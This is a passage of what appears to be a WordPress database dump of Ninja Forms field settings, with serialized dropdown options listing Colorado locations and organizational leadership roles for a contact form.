Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}'),(8697,179,'value','','value',''),(8698,180,'field_label','Last Name','field_label','Last Name'),(8699,180,'field_key','lastname_1550094079880','field_key','lastname_1550094079880'),(8700,180,'value','','value',''),(8701,181,'field_label','Email','field_label','Email'),(8702,181,'field_key','email_1550094081455','field_key','email_1550094081455'),(8703,181,'value','','value',''),(5049,171,'key','listselect_49','key','listselect_49'),(5050,171,'container_class','','container_class',''),(5051,171,'parent_id','16','parent_id','16'),(5052,172,'objectType','Field','objectType','Field'),(5053,172,'objectDomain','fields','objectDomain','fields'),(5054,172,'editActive','','editActive',''),(5055,172,'order','7','order','7'),(5056,172,'type','hr','type','hr'),(5057,172,'label','hr','label','hr'),(5058,172,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(5059,172,'show_desc','0','show_desc','0'),(5060,172,'desc_pos','none','desc_pos','none'),(5061,172,'desc_text','','desc_text',''),(5062,172,'element_class','','element_class',''),(5063,172,'key','hr_50','key','hr_50'),(5064,172,'container_class','','container_class',''),(5065,172,'parent_id','16','parent_id','16'),(5066,173,'objectType','Field','objectType','Field'),(5067,173,'objectDomain','fields','objectDomain','fields'),(5068,173,'editActive','','editActive',''),(5069,173,'order','8','order','8'),(5070,173,'type','html','type','html'),(5071,173,'label','Loveland Leadership Positions','label','Loveland Leadership Positions'),(5072,173,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(5073,173,'default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Loveland Leadership Positions</span></span></span></strong></span></h3>','default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Loveland Leadership Positions</span></span></span></strong></span></h3>'),(5074,173,'desc_el','div','desc_el','div'),(5075,173,'show_desc','0','show_desc','0'),(5076,173,'desc_pos','none','desc_pos','none'),(5077,173,'desc_text','','desc_text',''),(5078,173,'element_class','','element_class',''),(5079,173,'default','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Loveland Leadership Positions</span></span></span></strong></span></h3>','default','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Loveland Leadership Positions</span></span></span></strong></span></h3>'),(5080,173,'key','html_51','key','html_51'),(5081,173,'container_class','','container_class',''),(5082,173,'parent_id','16','parent_id','16'),(5083,174,'objectType','Field','objectType','Field'),(5084,174,'objectDomain','fields','objectDomain','fields'),(5085,174,'editActive','','editActive',''),(5086,174,'order','9','order','9'),(5087,174,'type','listselect','type','listselect'),(5088,174,'label','Select the person you would like to email','label','Select the person you would like to email'),(5089,174,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(5090,174,'label_pos','above','label_pos','above'),(5091,174,'list_type','dropdown','list_type','dropdown'),(5092,174,'multi_size','5','multi_size','5'),(5093,174,'list_show_value','1','list_show_value','1'),(5094,174,'list','a:0:{}','list','a:0:{}'),(5095,174,'user_info_field_group','','user_info_field_group',''),(5096,174,'calc_auto_include','0','calc_auto_include','0'),(5097,174,'user_state','0','user_state','0'),(5098,174,'num_sort','0','num_sort','0'),(5099,174,'admin_label','','admin_label',''),(5100,174,'show_help','0','show_help','0'),(5101,174,'help_text','','help_text',''),(5102,174,'show_desc','0','show_desc','0'),(5103,174,'desc_pos','none','desc_pos','none'),(5104,174,'desc_text','','desc_text',''),(5105,174,'element_class','','element_class',''),(5106,174,'required','1','required','1'),(5107,174,'options','a:6:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:14:\"Local Director\";s:5:\"value\";s:14:\"Local Director\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:32:\"Administrative Services Director\";s:5:\"value\";s:32:\"Administrative Services Director\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:22:\"ECK Center Coordinator\";s:5:\"value\";s:22:\"ECK Center Coordinator\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:27:\"Spiritual Services Director\";s:5:\"value\";s:27:\"Spiritual Services Director\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Vahana Leader\";s:5:\"value\";s:13:\"Vahana Leader\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}','options','a:6:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:14:\"Local Director\";s:5:\"value\";s:14:\"Local Director\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 